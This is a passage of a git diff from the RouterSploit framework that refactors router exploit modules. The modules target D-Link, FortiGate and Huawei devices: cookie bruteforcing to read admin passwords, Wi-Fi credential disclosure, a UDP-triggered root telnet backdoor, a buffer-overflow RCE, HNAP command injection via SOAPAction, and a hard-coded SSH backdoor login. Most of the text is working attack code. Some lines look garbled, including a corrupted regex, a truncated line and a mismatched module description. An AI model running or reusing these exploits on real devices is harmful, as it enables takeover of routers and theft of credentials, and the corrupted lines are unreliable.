+ data=data, + ) - if response is not None and "root:" in response.text: + if response and utils.detect_file_content(response.text, "/etc/shadow"): return True # target vulnerable return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py b/routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py index c84a38d15..89ecefc7a 100644 --- a/routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py +++ b/routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py @@ -1,41 +1,30 @@ -# -*- coding:utf-8 -*- import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - mute, - http_request, - validators, -) -class Exploit(exploits.Exploit): - """ - Exploits D-Link DWL-3200AP access points weak cookie value - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DWL-3200AP Password Disclosure', - 'description': 'Exploits D-Link DWL3200 access points weak cookie value', - 'authors': [ - 'pws', # Vulnerability discovery - 'Josh Abraham ', # routersploit module + "name": "D-Link DWL-3200AP Password Disclosure", + "description": "Exploits D-Link DWL3200 access points weak cookie value.", + "authors": [ + "pws", # Vulnerability discovery + "Josh Abraham ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/34206/', + "references": [ + "https://www.exploit-db.com/exploits/34206/", ], - 'devices': [ - 'D-Link DWL-3200AP', + "devices": [ + "D-Link DWL-3200AP", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") # 3600 seconds - one hour means that we will bruteforce authenticated cookie value that was valid within last hour - seconds = exploits.Option(3600, 'Number of seconds in the past to bruteforce') + seconds = OptInteger(3600, "Number of seconds in the past to bruteforce") def run(self): if self.check(): @@ -46,30 +35,27 @@ def run(self): start = cookie_int - int(self.seconds) print_status("Starting bruteforcing cookie value...") - for i in xrange(cookie_int, start, -1): + for i in range(cookie_int, start, -1): self.test_cookie(i) else: print_error("Target does not appear to be vulnerable") @mute def check(self): - """ - Method that verifies if the target is vulnerable. It should not write anything on stdout and stderr. - """ if self.get_cookie() is not None: return True return False def get_cookie(self): - """ - Method that retrieves current cookie from AP - """ - url = "{}:{}".format(self.target, self.port) pattern = "RpWebID=([a-z0-9]{8})" print_status("Attempting to get cookie...") try: - r = http_request(method='GET', url=url, timeout=3) + r = self.http_request( + method="GET", + path="/", + timeout=3 + ) tgt_cookie = re.search(pattern, r.text) if tgt_cookie is None: print_error("Unable to retrieve cookie") @@ -82,10 +68,14 @@ def test_cookie(self, cookie_int): """ Method that tests all cookies from the past to find one that is valid """ - url = "{}:{}/html/tUserAccountControl.htm".format(self.target, self.port) cookies = dict(RpWebID=str(cookie_int)) try: - r = http_request(method='GET', url=url, cookies=cookies, timeout=10) + r = self.http_request( + method='GET', + path="/html/tUserAccountControl.htm", + cookies=cookies, + timeout=10 + ) if ('NAME="OldPwd"' in r.text): print_success("Cookie {} is valid!".format(cookie_int)) pattern = r"NAME=\"OldPwd\" SIZE=\"12\" MAXLENGTH=\"12\" VALUE=\"([�-9]+)\"" diff --git a/routersploit/modules/exploits/routers/dlink/dwr_932_info_disclosure.py b/routersploit/modules/exploits/routers/dlink/dwr_932_info_disclosure.py index c84fa7145..85cf0f06d 100644 --- a/routersploit/modules/exploits/routers/dlink/dwr_932_info_disclosure.py +++ b/routersploit/modules/exploits/routers/dlink/dwr_932_info_disclosure.py @@ -1,44 +1,35 @@ import json +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_error, - print_table, - print_status, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DWR-932 Information Disclosure vulnerability. - If the target is vulnerable it allows to read credentials for administrator." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link DWR-932 Info Disclosure', - 'description': 'Module explois information disclosure vulnerability in D-Link DWR-932 devices. It is possible to retrieve sensitive information such as credentials.', - 'authors': [ - 'Saeed reza Zamanian' # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DWR-932 Info Disclosure", + "description": "Module explois information disclosure vulnerability in D-Link DWR-932 devices. " + "It is possible to retrieve sensitive information such as credentials.", + "authors": [ + "Saeed reza Zamanian", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/39581/', + "references": [ + "https://www.exploit-db.com/exploits/39581/", ], - 'devices': [ - 'D-Link DWR-932', + "devices": [ + "D-Link DWR-932", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): - url = "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port) + path = "/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return @@ -62,9 +53,12 @@ def run(self): @mute def check(self): - url = "{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703".format(self.target, self.port) + path = "/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase,wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list,get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode,get_wps_enable,get_wps_current_time&_=1458458152703" - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py b/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py index 27c660419..a1f33d30a 100644 --- a/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py +++ b/routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py @@ -1,38 +1,29 @@ import socket import telnetlib +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient +from routersploit.core.telnet.telnet_client import TelnetClient -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for D-Link DWR-932B backdoor vulnerability. - If the target is vulnerable, telnet access is provided with root privileges. - """ +class Exploit(TCPClient, TelnetClient): __info__ = { - 'name': 'D-LINK DWR-932B', - 'description': 'Module exploits D-Link DWR-932B backdoor vulnerability which allows executing command on operating system level with root privileges.', - 'authors': [ - 'Pierre Kim @PierreKimSec', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link DWR-932B", + "description": "Module exploits D-Link DWR-932B backdoor vulnerability which allows " + "executing command on operating system level with root privileges.", + "authors": [ + "Pierre Kim @PierreKimSec", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://pierrekim.github.io/advisories/2016-dlink-0x00.txt', + "references": [ + "https://pierrekim.github.io/advisories/2016-dlink-0x00.txt", ], - 'devices': [ - 'D-Link DWR-932B', + "devices": [ + "D-Link DWR-932B", ] } - target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4) - telnet_port = exploits.Option(23, 'Target telnet port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(23, "Target Telnet port") def run(self): sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) @@ -42,9 +33,9 @@ def run(self): response = "" try: - sock.sendto("HELODBG", (self.target, 39889)) + sock.sendto(b"HELODBG", (self.target, 39889)) response = sock.recv(1024) - except Exception: + except: pass sock.close() @@ -54,9 +45,9 @@ def run(self): print_status("Trying to connect to the telnet service {}:{}".format(self.target, self.telnet_port)) try: - tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10) + tn = telnetlib.Telnet(self.target, self.telnet_port) tn.interact() - except Exception: + except: print_error("Exploit failed - could not connect to the telnet service") else: print_error("Exploit failed - target seems to be not vulnerable") @@ -67,13 +58,13 @@ def check(self): sock.settimeout(10.0) try: - sock.sendto("HELODBG", (self.target, 39889)) + sock.sendto(b"HELODBG", (self.target, 39889)) response = sock.recv(1024) if "Hello" in response: - sock.sendto("BYEDBG", (self.target, 39889)) + sock.sendto(b"BYEDBG", (self.target, 39889)) return True # target is vulnerable - except Exception: + except: pass return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py b/routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py index f9f429ff0..6ceec6bfd 100644 --- a/routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py +++ b/routersploit/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py @@ -1,81 +1,86 @@ import struct -from routersploit import ( - exploits, - print_error, - print_success, - print_status, - random_text, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation of DLINK Hedwig Buffer Overflow, allows command execution on devices without authentication. It overflows the cookie - uid value of hedwig.cgi. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-LINK Hedwig CGI RCE', - 'description': 'Module exploits an buffer overflow that leads to remote code execution', - - 'authors': ['Austin '], # routersploit module - 'references': [ - 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008', - 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000', - 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt', - 'https://www.exploit-db.com/exploits/27283/' + "name": "D-Link Hedwig CGI RCE", + "description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, " + "which leads to remote code execution.", + "authors": [ + "Austin ", # routersploit module + ], + "references": [ + "http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008", + "http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000", + "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", + "https://www.exploit-db.com/exploits/27283/", ], - 'devices': [ - 'DIR-645 Ver 1.03', - 'DIR-300 Ver 2.14', - 'DIR-600' # tested on DIR-600 Ver 2.12 + "devices": [ + "D-Link DIR-645 Ver. 1.03", + "D-Link DIR-300 Ver. 2.14", + "D-Link DIR-600", ], } - target = exploits.Option('', 'Target address e.g http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port', validators=validators.integer) # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): - print_success("Target is vulnerable!") + print_success("Target is vulnerable") print_status("Invoking command loop...") - shell(self, architecture="mipsle", method="echo", location="/tmp", + shell(self, architecture="mipsle", method="echo", locaiton="/tmp", echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}") else: print_error("Target is not vulnerable") def execute(self, cmd): + cmd = cmd.encode("utf-8") + libcbase = 0x2aaf8000 system = 0x000531FF calcsystem = 0x000158C8 callsystem = 0x000159CC - shellcode = random_text(973) + shellcode = utils.random_text(973).encode("utf-8") shellcode += struct.pack("") + len(""):].strip() @mute def check(self): - fingerprint = random_text(10) - cmd = "echo {}".format(fingerprint) + fingerprint = utils.random_text(10) + cmd = "echo {}".format(fingerprint) response = self.execute(cmd) if fingerprint in response: return True + return False diff --git a/routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py b/routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py index 927338692..104dbd10d 100644 --- a/routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py +++ b/routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py @@ -1,51 +1,40 @@ -from routersploit import ( - exploits, - print_status, - print_error, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient - -class Exploit(exploits.Exploit): - """ - Exploit implementation for HNAP Remote Code Execution vulnerability in multiple D-Link devices. - If the target is vulnerable, command loop is invoked that allows executing commands on the device. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'D-Link Multi HNAP RCE', - 'description': 'Module exploits HNAP remote code execution vulnerability in multiple D-Link devices which allows executing commands on the device.', - 'authors': [ - 'Samuel Huntley', # vulnerability discovery - 'Craig Heffner', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "D-Link Multi HNAP RCE", + "description": "Module exploits HNAP remote code execution vulnerability in multiple D-Link " + "devices which allows executing commands on the device.", + "authors": [ + "Samuel Huntley", # vulnerability discovery + "Craig Heffner", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/37171/', - 'https://www.exploit-db.com/exploits/38722/', - 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/', + "references": [ + "https://www.exploit-db.com/exploits/37171/", + "https://www.exploit-db.com/exploits/38722/", + "http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/", ], - 'devices': [ - 'D-Link DIR-645', - 'D-Link AP-1522 revB', - 'D-Link DAP-1650 revB', - 'D-Link DIR-880L', - 'D-Link DIR-865L', - 'D-Link DIR-860L revA', - 'D-Link DIR-860L revB', - 'D-Link DIR-815 revB', - 'D-Link DIR-300 revB', - 'D-Link DIR-600 revB', - 'D-Link DIR-645', - 'D-Link TEW-751DR', - 'D-Link TEW-733GR', + "devices": [ + "D-Link DIR-645", + "D-Link AP-1522 revB", + "D-Link DAP-1650 revB", + "D-Link DIR-880L", + "D-Link DIR-865L", + "D-Link DIR-860L revA", + "D-Link DIR-860L revB", + "D-Link DIR-815 revB", + "D-Link DIR-300 revB", + "D-Link DIR-600 revB", + "D-Link DIR-645", + "D-Link TEW-751DR", + "D-Link TEW-733GR", ] } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -59,18 +48,24 @@ def run(self): def execute(self, cmd): cmd_new = "cd && cd tmp && export PATH=$PATH:. && {}".format(cmd) soap_action = '"http://purenetworks.com/HNAP1/GetDeviceSettings/`{}`"'.format(cmd_new) - url = "{}:{}/HNAP1/".format(self.target, self.port) headers = {"SOAPAction": soap_action} - http_request(method="POST", url=url, headers=headers) + self.http_request( + method="POST", + path="/HNAP1/", + headers=headers + ) return "" @mute def check(self): - url = "{}:{}/HNAP1/".format(self.target, self.port) headers = {"SOAPAction": '"http://purenetworks.com/HNAP1/GetDeviceSettings"'} - response = http_request(method="GET", url=url, headers=headers) + response = self.http_request( + method="GET", + path="/HNAP1/", + headers=headers + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py index 4e02da707..5d7364da4 100644 --- a/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py +++ b/routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py @@ -2,28 +2,17 @@ import base64 import hashlib -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - mute, - ssh_interactive, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.ssh.ssh_client import SSHClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for FortiGate OS Version 4.x up to 5.0.7 vulnerability. - If the target is vulnerable, remote access to the system is provided. - """ +class Exploit(SSHClient): __info__ = { 'name': 'FortiGate OS 4.x-5.0.7 Backdoor', 'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.', 'authors': [ 'operator8203', # vulnerability discovery - 'Marcin Bury ', # routersploit module + 'Marcin Bury ', # routersploit module ], 'references': [ 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router', @@ -35,18 +24,18 @@ class Exploit(exploits.Exploit): ] } - target = exploits.Option('', 'Target IP address', validators=validators.ipv4) - ssh_port = exploits.Option(22, 'Target Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(22, "Target SSH port") def run(self): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: - client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False) + client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass - except Exception: + except: print_error("Exploit Failed - SSH Service is down") return @@ -55,7 +44,7 @@ def run(self): trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass - except Exception: + except: print_status("Error with Existing Session. Wait few minutes.") return @@ -64,7 +53,7 @@ def run(self): print_success("Exploit succeeded") ssh_interactive(client) - except Exception: + except: print_error("Exploit failed") return @@ -74,10 +63,10 @@ def check(self): client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: - client.connect(self.target, self.ssh_port, username='', allow_agent=False, look_for_keys=False) + client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False) except paramiko.ssh_exception.SSHException: pass - except Exception: + except: return False # target is not vulnerable trans = client.get_transport() @@ -85,12 +74,12 @@ def check(self): trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) except paramiko.ssh_exception.AuthenticationException: pass - except Exception: + except: return None # could not verify try: trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler) - except Exception: + except: return False # target is not vulnerable return True # target is vulnerable diff --git a/routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py b/routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py index 44a8e43ff..60def3303 100644 --- a/routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py +++ b/routersploit/modules/exploits/routers/huawei/e5331_mifi_info_disclosure.py @@ -1,46 +1,38 @@ import re +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -from routersploit import ( - exploits, - print_success, - print_table, - http_request, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Huawei E5331 Information Disclosure vulnerability. - If the target is vulnerable it allows to read sensitive information." - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'Huawei E5331 Info Disclosure', - 'description': 'Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot' - 'devices. If the target is vulnerable it allows to read sensitive information.', - 'authors': [ - 'J. Greil https://www.sec-consult.com', # vulnerability discovery - 'Marcin Bury ', # routersploit module + "name": "Huawei E5331 Info Disclosure", + "description": "Module exploits information disclosure vulnerability in Huawei E5331 MiFi Mobile Hotspot" + "devices. If the target is vulnerable it allows to read sensitive information.", + "authors": [ + "J. Greil https://www.sec-consult.com", # vulnerability discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/32161/', + "references": [ + "https://www.exploit-db.com/exploits/32161/", ], - 'devices': [ - 'Huawei E5331 MiFi Mobile Hotspot', + "devices": [ + "Huawei E5331 MiFi Mobile Hotspot", ], } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1") + port = OptPort(80, "Target HTTP port") - opts = ['WifiAuthmode', 'WifiBasicencryptionmodes', 'WifiWpaencryptionmodes', 'WifiWepKey1', 'WifiWepKey2', - 'WifiWepKey3', 'WifiWepKey4', 'WifiWepKeyIndex', 'WifiWpapsk', 'WifiWpsenbl', 'WifiWpscfg', 'WifiRestart'] + def __init__(self): + self.opts = ["WifiAuthmode", "WifiBasicencryptionmodes", "WifiWpaencryptionmodes", "WifiWepKey1", "WifiWepKey2", + "WifiWepKey3", "WifiWepKey4", "WifiWepKeyIndex", "WifiWpapsk", "WifiWpsenbl", "WifiWpscfg", "WifiRestart"] def run(self): - url = "{}:{}/api/wlan/security-settings".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/api/wlan/security-settings", + ) + if response is None: return False # target is not vulnerable @@ -57,9 +49,10 @@ def run(self): @mute def check(self): - url = "{}:{}/api/wlan/security-settings".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/api/wlan/security-settings", + ) if response is None: return False # target is not vulnerable diff --git a/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py b/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py index 162e74664..b72e9e980 100644 --- a/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py +++ b/routersploit/modules/exploits/routers/huawei/hg520_info_dislosure.py @@ -1,73 +1,66 @@ import socket +from routersploit.core.exploit import* +from routersploit.core.udp.udp_client import UDPClient -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_info, - mute, - validators, -) - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Huawei EchoLife HG520 devices. If the target is vulnerable it is possible to retrieve sensitive information. - """ +class Exploit(UDPClient): __info__ = { - 'name': 'Huawei HG520 Information Disclosure', - 'description': 'Module exploits Huawei EchoLife HG520 information disclosure vulnerablity.' - 'If the target is vulnerable it is possible to retrieve sensitive information.', - 'authors': [ - 'hkm', # vulnerablity discovery - 'Marcin Bury ', # routersploit module + "name": "Huawei HG520 Information Disclosure", + "description": "Module exploits Huawei EchoLife HG520 information disclosure vulnerablity. " + "If the target is vulnerable it is possible to retrieve sensitive information.", + "authors": [ + "hkm", # vulnerablity discovery + "Marcin Bury ", # routersploit module ], - 'references': [ - 'https://www.exploit-db.com/exploits/12298/', + "references": [ + "https://www.exploit-db.com/exploits/12298/", ], - 'devices': [ - 'Huawei HG520', + "devices": [ + "Huawei HG520", ], } - target = exploits.Option('', 'Target IP address', validators=validators.address) # target address + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(43690, "Target port") - payload = ("\x00\x01\x00\x00\x0e\x00\xeb\x03\x7f\x0a\x5f\x00\x10\x00\x02\x00\x13\x00\x00\x00\x50\x02\x00\x00\xe0\xf4\x12\x00\xb0\xaa\x19\x00" - "\x18\x87\x15\x00\x84\xfb\x12\x00\x00\x00\x00\x00\x78\x76\x4b\x02\xa8\x87\xec\x01\x00\x00\x00\x00\x38\x12\x19\x00\x10\xf5\x12\x00" - "\x32\x00\x00\x00\x34\x60\x5d\x77\x00\x00\x00\x00\x84\xfb\x12\x00\x01\x00\x00\x00\xb8\x88\x24\x00\xf8\x8f\x19\x00\x0d\x00\x00\x00" - "\x18\x94\x19\x00\xf8\x98\x19\x00\x74\xf4\x12\x00\x84\xf6\x12\x00\x4c\xf7\x12\x00\x00\xe9\x91\x7c\x10\x6f\x94\x7c\x00\x00\xff\xff" - "\xae\x2c\x92\x7c\xe4\x2c\x92\x7c\x51\x2d\x92\x7c\x58\x2d\x92\x7c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\xf7\x12\x00" - "\x44\xf5\x12\x00\xb0\x65\x92\x7c\xf8\xf7\x12\x00\x00\xe9\x91\x7c\x60\x2d\x92\x7c\xff\xff\xff\xff\x58\x2d\x92\x7c\x12\x66\x92\x7c" - "\x01\x00\x00\x00\x76\x02\x48\x0d\xee\x64\x92\x7c\x00\x00\x00\x00\x9c\x70\x40\x00\x00\x00\x00\x00\x34\x60\x5d\x77\x30\x28\x1f\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x70\x2f\x15\x00\x78\x01\x15\x00\x00\x00\x00\x00\x78\x2f\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x54\xf8\x12\x00\xa8\x87\xec\x01\x50\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x76\x02\x48\x0d\x00\x00\x08\x02" - "\xe4\xf5\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\xf8\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xf6\x12\x00\x0d\x00\x00\x00\xa2\x6f\x94\x7c\xf8\x98\x19\x00\x78\x76\x4b\x02\xd8\x93\x19\x00" - "\x60\x90\x19\x00\x0d\x00\x00\x00\xf8\x8f\x19\x00\x84\xfb\x12\x00\x28\xf6\x12\x00\x30\xd4\x4c\x77\x48\xf7\x12\x00\x00\xe9\x91\x7c" - "\x94\xf6\x12\x00\x94\xf6\x12\x00\xd8\x93\x19\x00\xec\x73\x94\x7c\x70\xe3\x4b\x02\x00\x00\x00\x00\x00\x00\x15\x00\x00\x00\x00\x00" - "\x00\x00\x00\x00\x0f\x00\x41\x00\x13\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\xf8\x98\x19\x00\xb4\xf9\x12\x00\xf8\x8f\x19\x00" - "\x58\xf7\x12\x00\x3d\x00\x92\x7c\xf6\x89\xec\x01\x00\x00\x00\x00\xe8\x06\x02\x00\x54\xfc\x12\x00\x01\x00\x00\x00\x01\x00\x00\x00" - "\x00\x00\x00\x00\x12\xe1\xf8\x09\x7d\x0b\x00\x00\x72\xab\x56\x48\x3f\xe1\xbe\x07\x15\x04\x92\x7c\x1e\x04\x92\x7c\x00\x00\x00\x00" - "\x00\x00\x00\x00\x00\xe0\xfd\x7f\xeb\x50\xd7\xc6\x1a\x00\x00\x00\x00\xe0\xfd\x7f\x00\x10\x91\x7c\x00\x00\x00\x00\x00\x00\x01\x00" - "\x00\xe0\xfd\x7f\x5c\xf7\x12\x00\xe6\x45\x92\x7c\x40\x04\x92\x7c\x00\xd6\x98\x7c\x48\xf7\x12\x00\x40\x12\x19\x00\x8a\x74\x94\x7c" - "\x2c\xf7\x12\x00\xa8\x87\xec\x01\x00\x00\x00\x00\x00\x00\x15\x00\x0e\x00\xeb\x03\x80\x0a\x5f\x00\x64\x46\x00\x10\xfe\xf7\x12\x00" - "\xb0\x44\x00\x10\x04\x00\x00\x00\x8c\xf7\x12\x00\xd3\x7e\x92\x7c\xfe\xf7\x12\x00\x31\x00\x00\x00\x00\x00\x00\x10\xa0\x45\x00\x10" - "\x64\x46\x00\x10\x00\x00\x00\x00\x01\x00\x00\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x10\xe0\x00\x00\x10" - "\x64\xf7\x12\x00\x01\x00\x00\x00\x9c\xf7\x12\x00\x65\x03\x92\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x58\xf8\x12\x00\x9a\x7d\x92\x7c" - "\x00\x00\x00\x10\xfe\xf7\x12\x00\xf8\xf7\x12\x00\xf8\xf7\x12\x00\xfe\xf7\x12\x00\x3f\x7e\x92\x7c\x78\xb1\x98\x7c\xe9\x7d\x92\x7c" - "\x8c\x70\x40\x00\x9c\x70\x40\x00\xff\xff\x00\x00\x00\xd0\xfd\x7f\xe0\x47\x25\x00\x08\xe4\x80\x7c\xb0\x44\x00\x10\x6c\xe4\x80\x7c" - "\xf0\x47\x25\x00\xa8\xf8\x12\x00\x00\x00\x00\x10\x00\x00\x00\x00\xfc\xf7\x12\x00\xfc\xf7\x12\x00\x00\x00\x00\x00\xfe\x04\x00\x00" - "\xd0\x41\x25\x00\x00\x1b\x00\x10\x00\x00\x67\x65\x74\x41\x64\x73\x6c\x53\x74\x61\x74\x75\x73\x00\x3d\x00\x92\x7c\xea\x1b\x80\x7c" - "\x00\x00\x15\x00\x00\x00\x00\x00\xfa\x1b\x80\x7c\x64\x5d\x47\x00\x9c\x70\x40\x00\x9f\xac\x80\x7c\x4e\x02\x50\x02\xa8\x87\xec\x01" - "\x16\x00\x18\x00\x00\xdc\xfd\x7f\xef\xfa\x00\x00\xb4\xf7\x12\x00\xa8\x87\xec\x01\xa8\xf9\x12\x00\x00\xe9\x91\x7c\xf0\x7d\x92\x7c" - "\xff\xff\xff\xff\xe9\x7d\x92\x7c\xa0\x7e\x92\x7c\x00\x00\x00\x10\x94\xf8\x12\x00\x00\x00\x00\x00\xa8\xf8\x12\x00\x01\x00\x00\x00" - "\x9c\xf8\x12\x00\x6e\xae\x80\x7c\x9c\xf8\x12\x00\x80\xae\x80\x7c\x00\x00\x00\x10\x00\x00\x00\x00\x64\x5d\x47\x00\x9f\xac\x80\x7c" - "\x0d\x00\x0e\x00\x8c\x70\x40\x00\xc4\xf8\x12\x00\xd8\xa0\x00\x66\x00\x00\x00\x10\x00\x1b\x00\x10\x84\xfb\x12\x00\x54\xfc\x12\x00" - 